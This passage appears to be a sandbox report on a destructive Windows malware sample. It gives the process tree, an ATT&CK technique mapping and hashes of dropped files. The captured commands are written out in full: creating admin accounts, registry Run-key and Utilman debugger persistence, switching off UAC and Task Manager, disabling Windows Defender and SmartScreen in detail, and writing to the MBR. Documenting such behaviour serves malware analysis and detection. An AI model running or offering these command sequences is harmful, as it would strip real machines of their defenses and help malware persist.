C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin6207 /add4⤵PID:7904
-
-
-
C:\Windows\system32\net.exenet user Admin2239 /add3⤵PID:7932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin2239 /add4⤵PID:7952
-
-
-
C:\Windows\system32\net.exenet user Admin6664 /add3⤵PID:7980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin6664 /add4⤵PID:8000
-
-
-
C:\Windows\system32\net.exenet user Admin16704 /add3⤵PID:8020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin16704 /add4⤵PID:8044
-
-
-
C:\Windows\system32\net.exenet user Admin28690 /add3⤵PID:8068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin28690 /add4⤵PID:8096
-
-
-
C:\Windows\system32\cscript.execscript email_spam.vbs3⤵PID:8172
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "sex.exe" /d "C:\Windows\System32\sex.exe"3⤵
- Adds Run key to start application
PID:6752
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "mbr.exe" /d "C:\Windows\N3OS3X3R\mbr.exe"3⤵
- Adds Run key to start application
PID:7228
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "longlongago" /d "C:\Windows\N3OS3X3R\cds.bat"3⤵
- Adds Run key to start application
PID:7288
-
-
C:\Windows\system32\reg.exereg add HKLM\System\CurrentControlSet\Control\SafeBoot /v AlternateShell /t REG_SZ /d "C:\Windows\System32\cds.bat" /f3⤵
- Modifies registry key
PID:7424
-
-
C:\Windows\system32\reg.exereg add HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName /v "ComputerName" /t REG_SZ /d "Neo" /f3⤵
- Modifies registry key
PID:7524
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "s1159" /t REG_SZ /d "Neo" /f3⤵PID:7476
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "s2359" /t REG_SZ /d "Neo" /f3⤵PID:7640
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "sCountry" /t REG_SZ /d "Country of Sex" /f3⤵PID:7672
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "sCurrency" /t REG_SZ /d "Neo" /f3⤵PID:7712
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "sNativeDigits" /t REG_SZ /d "Neo" /f3⤵PID:7772
-
-
C:\Windows\system32\reg.exereg add "HKCU\Console" /v "CursorSize" /t REG_DWORD /d "199" /f3⤵PID:7780
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Policies\CredentialUI" /v "DisablePasswordReveal" /t REG_DWORD /f /d 13⤵PID:7856
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v BatteryFlyout /t REG_DWORD /f /d 03⤵PID:7876
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v HelpCustomized /t REG_DWORD /f /d 13⤵PID:7960
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Manufacturer /t REG_SZ /f /d "Neo"3⤵PID:8008
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Model /t REG_SZ /f /d "Neo"3⤵PID:8044
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportHours /t REG_SZ /f /d "Neo"3⤵PID:8028
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportPhone /t REG_SZ /f /d "Neo"3⤵PID:8068
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportURL /t REG_SZ /f /d "http://www.neocorporations.com"3⤵PID:8124
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\MTCUVC" /v EnableMtcUvc /t REG_DWORD /f /d 03⤵PID:8128
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "shutdownwithoutlogon" /t REG_DWORD /f /d 03⤵PID:7296
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DontDisplayNetworkSelectionUI" /t REG_DWORD /f /d 03⤵PID:7668
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v "Debugger" /t REG_SZ /d "C:\Windows\System32\sex.exe" /f3⤵PID:7596
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f3⤵PID:7968
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:7984
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:8052
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f3⤵PID:8060
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f3⤵PID:8072
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /3⤵PID:8160
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵PID:8100
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f3⤵PID:8040
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:2764
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:1796
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f3⤵PID:6572
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f3⤵PID:7236
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:7232
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵PID:8172
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵PID:6756
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵PID:7548
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵PID:7660
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵PID:7636
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵PID:7672
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:7760
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:7772
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:7820
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:7744
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:8032
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:7988
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:8072
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:7996
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:8100
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:8184
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:8180
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:6580
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:7436
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:6476
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:8108
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:8172
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:3076
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:7664
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:7172
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:7676
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:7492
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:7636
-
-
C:\Windows\system32\sc.exesc config webthreatdefsvc start= disabled3⤵
- Launches sc.exe
PID:7672
-
-
C:\Windows\system32\sc.exesc config webthreatdefusersvc start= disabled3⤵
- Launches sc.exe
PID:7760
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f3⤵PID:7648
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /v /t REG_DWORD /d "0" /f3⤵PID:7820
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /v /t REG_DWORD /d "0" /f3⤵PID:7916
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d "0" /f3⤵PID:7744
-
-
C:\Windows\system32\takeown.exetakeown /s VDERDMTV /u Admin /f "C:\Windows\System32\smartscreen.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:7988
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\smartscreen.exe" /grant:r Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:8060
-
-
C:\Windows\system32\taskkill.exetaskkill /im smartscreen.exe /f3⤵
- Kills process with taskkill
PID:8076
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:3548
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵PID:1752
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:4524
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x500 0x44c1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\sex.exe1⤵PID:7248
-
C:\Windows\System32\sex.exeC:\Windows\System32\sex.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:7376 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9B0D.tmp\9B0E.tmp\9B0F.bat C:\Windows\System32\sex.exe"3⤵
- Drops file in System32 directory
PID:7496 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /f /d 14⤵PID:7548
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\system32\ajae.txt4⤵
- Opens file in notepad (likely ransom note)
PID:7824
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- Modifies registry key
PID:7932
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f4⤵
- Modifies registry key
PID:8000
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\system32\bozo.vbs"4⤵PID:8176
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\system32\bozo2.vbs"4⤵PID:7304
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\system32\bozo3.vbs"4⤵PID:7444
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\system32\bozo4.vbs"4⤵PID:7516
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\system32\bozo5.vbs"4⤵PID:7608
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\system32\bozo6.vbs"4⤵PID:7736
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\system32\bozo7.vbs"4⤵PID:7776
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak4⤵
- Delays execution with timeout.exe
PID:7800
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\N3OS3X3R\mbr.exe1⤵PID:7284
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:7272
-
-
C:\Windows\N3OS3X3R\mbr.exeC:\Windows\N3OS3X3R\mbr.exe2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
PID:6188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\N3OS3X3R\cds.bat1⤵PID:7348
-
C:\Windows\system32\mode.commode 802⤵PID:7080
-
-
C:\Windows\system32\mode.commode 702⤵PID:7612
-
-
C:\Windows\system32\mode.commode 502⤵PID:7840
-
-
C:\Windows\system32\mode.commode 402⤵PID:7908
-
-
C:\Windows\system32\mode.commode 302⤵PID:8040
-
-
C:\Windows\system32\mode.commode 802⤵PID:3076
-
-
C:\Windows\system32\mode.commode 702⤵PID:7744
-
-
C:\Windows\system32\mode.commode 502⤵PID:8036
-
-
C:\Windows\system32\mode.commode 402⤵PID:8108
-
-
C:\Windows\system32\mode.commode 302⤵PID:7492
-
-
C:\Windows\system32\mode.commode 802⤵PID:7596
-
-
C:\Windows\system32\mode.commode 702⤵PID:8024
-
-
C:\Windows\system32\mode.commode 502⤵PID:8092
-
-
C:\Windows\system32\mode.commode 402⤵PID:8020
-
-
C:\Windows\system32\mode.commode 302⤵PID:8084
-
-
C:\Windows\system32\mode.commode 802⤵PID:2764
-
-
C:\Windows\system32\mode.commode 702⤵PID:8168
-
-
C:\Windows\system32\mode.commode 502⤵PID:7236
-
-
C:\Windows\system32\mode.commode 402⤵PID:8124
-
-
C:\Windows\system32\mode.commode 302⤵PID:6756
-
-
C:\Windows\system32\mode.commode 802⤵PID:7660
-
-
C:\Windows\system32\mode.commode 702⤵PID:7708
-
-
C:\Windows\system32\mode.commode 502⤵PID:7668
-
-
C:\Windows\system32\mode.commode 402⤵PID:7956
-
-
C:\Windows\system32\mode.commode 302⤵PID:7904
-
-
C:\Windows\system32\mode.commode 802⤵PID:8024
-
-
C:\Windows\system32\mode.commode 702⤵PID:8000
-
-
C:\Windows\system32\mode.commode 502⤵PID:8072
-
-
C:\Windows\system32\mode.commode 402⤵PID:8116
-
-
C:\Windows\system32\mode.commode 302⤵PID:8100
-
-
C:\Windows\system32\mode.commode 802⤵PID:8068
-
-
C:\Windows\system32\mode.commode 702⤵PID:8184
-
-
C:\Windows\system32\mode.commode 502⤵PID:8180
-
-
C:\Windows\system32\mode.commode 402⤵PID:1796
-
-
C:\Windows\system32\mode.commode 302⤵PID:6580
-
-
C:\Windows\system32\mode.commode 802⤵PID:7236
-
-
C:\Windows\system32\mode.commode 702⤵PID:6476
-
-
C:\Windows\system32\mode.commode 502⤵PID:8108
-
-
C:\Windows\system32\mode.commode 402⤵PID:6472
-
-
C:\Windows\system32\mode.commode 302⤵PID:3076
-
-
C:\Windows\system32\mode.commode 802⤵PID:6756
-
-
C:\Windows\system32\mode.commode 702⤵PID:7172
-
-
C:\Windows\system32\mode.commode 502⤵PID:7660
-
-
C:\Windows\system32\mode.commode 402⤵PID:7492
-
-
C:\Windows\system32\mode.commode 302⤵PID:7636
-
-
C:\Windows\system32\mode.commode 802⤵PID:7672
-
-
C:\Windows\system32\mode.commode 702⤵PID:7760
-
-
C:\Windows\system32\mode.commode 502⤵PID:8088
-
-
C:\Windows\system32\mode.commode 402⤵PID:6572
-
-
C:\Windows\system32\mode.commode 302⤵PID:6752
-
-
C:\Windows\system32\mode.commode 802⤵PID:8
-
-
C:\Windows\system32\mode.commode 702⤵PID:7176
-
-
C:\Windows\system32\mode.commode 502⤵PID:5116
-
-
C:\Windows\system32\mode.commode 402⤵PID:5180
-
-
C:\Windows\system32\mode.commode 302⤵PID:7548
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Accessibility Features
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Accessibility Features
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
2Windows File and Directory Permissions Modification
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
280B
MD59a1d48286ce97f5ce9bb99ff9b214ed5
SHA1f185dae5f66c2d622bd1fefeaa30223f737a67e7
SHA2560cf61088061592d94572c01fc6e6009cca561f2c3fdaacf76b6895964ad6e7a9
SHA512d1125f928650766c4fa2f12e614cd2f6de47b650cd56e8770e91cedff4edd03bea4229c9962dfc4778c2e55a7e39a959fb61cc16f4689830c157c93dd6934e0a
-
Filesize
216KB
MD550a7159ff34dea151d624f07e6cb1664
SHA1e13fe30db96dcee328efda5cc78757b6e5b9339c
SHA256e990d9d31c4c7d57dd4795e43baea05501fb6ea8b7760f89001be660425dd01b
SHA512a7768dd7e315b07754a305080e0fc023765e5a224b2c3824e8e10f29286df63bbdefef379e069941fd8cd9c7c3befce976779ae2efdfb6e7da697b09d7f07250
-
Filesize
38KB
MD59436affc97843765a966b3568fa7e5ec
SHA17bfda74bb30589c75d718fbc997f18c6d5cc4a0b
SHA2567165713d3e1a610399471a5e93d5677508f62ef072c1151e72273bf4bd54f916
SHA512473ec3a843c33e18d6d194651fe11353fcd03a7959225faeabf8c77484155ea6a7bccb72dbaf2093ed53c408faa3be9f6fc907f7a5ddf8223375f9d09b504456
-
Filesize
72KB
MD57b85ce6d64312e6f0d8f712897a45a66
SHA1431224de66f74e70ae5b37a67260b795352861eb
SHA25603a79fc56e2b58121ca2fe5938be882582ca7c26cc4208ebf777de6220f59fe1
SHA512b22d7680c82a5a45d0094dc16b0983ff59c5e3e0567d2854be14cde6a56af63729a1c4e041223fe26569e92961c49a80d603136e88d60f8f7b78ca1999b4fb3c
-
Filesize
228KB
MD541548f55a11d73026d2319e089f753cf
SHA1c3ae4dd1736e68955ae7f5289751b2c919c18bc0
SHA2569a1a39e7a423e5332ac17554cb83baeb5894afeda00d95370855c98a85f062b2
SHA5123afae15aae47ba772129551658a449736b29da7d1d26dd47f5357cddeb6feee3920a50fd850f5cfaa372bfa5a17f3bca8ce5393383ade1d854ad39e06735fa3a
-
Filesize
197KB
MD5c8535e48efcced3cc1fe1ff78d28251a
SHA1962e4d7ff0d8f68e5d8caced19eb636203567784
SHA256e50247b6afbba4694d5f9e304595922ecff494b237b9a6eac37c2bede5efd964
SHA5125e4b3ffa9058f3ce4dc4e8c10815f56c221cd8703905c641d6efaeb2a3341478e96bf99b6495759033ce0812d1bfe8cec5a306055fcb0b7b897bb2e1f2319372
-
Filesize
326KB
MD5501a6d4f08de9267914c24b1a309f087
SHA10c289eeccd8e7d979654393e16fbaa7535b373aa
SHA2565b49d494ba814ba2ab40100d6585cb92c5a7cef6c6bc0e982e2703042e9aa43f
SHA512ade166ae87a97fd3deb2d995530f5b187a788456d52e5751a381c25dd0ec27d8ad04e9d8f3991a5db1e72df2996e4cbb214597baf7dad943beaf193aa5ef5625
-
Filesize
413KB
MD5bf6d37998dfdae387b8dcc7270950c22
SHA1135344732eae1478e69205cd94915241c31fbeea
SHA2560d4b3156b465bdfe355c344ea803fe35ad67f919e5ef6ab1fb7a8cb6322a9f73
SHA5126ba6d5f4b2bc02c653282c3b215f4b98dc419e8885382c6c591cf1e96214797fcd9dd2c63b2d8a70d1242d7e240a7e3c21eb7e37b6bed11f245f2346bb067c04
-
Filesize
75KB
MD5246a24a3d506b949f0a6b0f1a723c092
SHA125219e2e11d5ad0712c33341449f4443d61589f1
SHA2562b91762c1ac53798673c73b0831f7c579cd8207c2107bc239e2852c0b443256c
SHA5122e8d91b4d35706d4c7aeedbd7ceed7533d7db5a55d97a8ae0321216783c44c830082879a12fdd93b631e6a8018e8cba8e575657b8405d25199fc8f9f6c6cf393
-
Filesize
293KB
MD531b457c1dacdd5b630d1460b304e8f31
SHA1a0ebeb3f41ef01c492f3b368424cd94e256b1817
SHA256ae37fe89682896595185822685fd154a06af1f8c912d9c837853e5672c324174
SHA5120c93024d2152885866a70232f495f85112e2b5548c7f7dd55a5e610bc831e8080fafe5cf2bf6b4f593f12d03ffbe8b8cf485195db702725308491b39f2a282d3
-
Filesize
352B
MD515ff7adb1aaa0db87561b8a784f24a11
SHA17d4137f8cc828b8213fd7b74fae2f23990a1d893
SHA256b965a598c06a5066601e44ce6b7923e8d5491e4f496fe0ad86300bbf13ef0cb2
SHA5120c98185dce3819a025642cba91326623b15b924e0a40d0650e3f84c8075e65f1ac2f8bf96a4546705f0f3fe10881375a1125d091b722a09929f048c2a54d8d77
-
Filesize
293KB
MD50179ca8128cc4215ae2c496af511e7aa
SHA1c61bdf99ebb223c701babe98b25c35017ce2222f
SHA256e7987b19e502c9536f9717721d12e5df005dbfd2bb42312a63a3115c2441ca94
SHA5121958376b122760a33195cda821fcef0f98defd9c32e9f77186e9026aa572eec9a05c2fd1a91c00c2324f135f2fa9fb8b0bc896148c3f4a23268c28aa7f1042b7
-
Filesize
351B
MD54700b00b20771e29c72c30e9a38a1aef
SHA167f85ee42c9d054a57099b1c22f592aff967138a
SHA256957ff4ac6cc026d479d6fd7ed72337b67705a6cc7d31f729ea0b85bed5d89ef4
SHA51238799504311018e51c715662fa06bd3f17386d2806fb62ac28afa53ae14eb885195dbc1952a32f89d2f5b09e007988b666fda91ab416a5ba20e97db42cf5760e
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
107KB
MD540e2018187b61af5be8caf035fb72882
SHA172a0b7bcb454b6b727bf90da35879b3e9a70621e
SHA256b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5
SHA512a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12
-
Filesize
10KB
MD58c594905629667abd7c39136a9752d69
SHA18d50cbf414bde8d53b86d46b5616838211d0b6ef
SHA25616ebfb4a24d03f3e9ba736202a487565acf8903056ebaad0e4bd89978983594a
SHA512a8fd31c7ab2726f51aa51cfba53af8c97958ca990746094b7b48d6249f8bf9f084b19cbfd9ce63b711a0157a8f1bea467d4ecfb31fa1350b79f5cb161fcd55b6
-
Filesize
13KB
MD584e897c6c46f713e79ac68e9de32405b
SHA14338010ed0b460c0567f9fc48a9721e44392b757
SHA25635ab085000f417dc8c8f799d13524edb7e7782690406728472a93d0688dd3002
SHA51210319ca73c57a7a1efbd219417a7880f4adcddd052a13c734351fcbea9967f6b2482bc306e24daee041e1a32b759d85123c85d7991f135121f8e84f73008bc46
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
Filesize
20KB
MD528b310250dc50e9691e5eb2ac104f88f
SHA134acea600861e5e831ba9f8d355831f433b97535
SHA256b8de17f5f9f98333e838a54745c2ea30b427377a4e120b8d0332dbd79559b5fd
SHA512dcdf239e5bc150517424c125b97c30127e6cf4a3de14e778201cb3f41348cda9b0f1b260c22659c3810c521d1ceddff22f0d5cc440eaa2cd80f41e7da0870ebd
-
Filesize
17KB
MD5f3b32d03cd1bda618f8645b0fa62b3c7
SHA1580bb1a4075205931202ad2d1ae3f9f818465335
SHA2567212c18bb05679afbae382b32e3af8d56a75630b547f0a0a44be1e3a337ca7aa
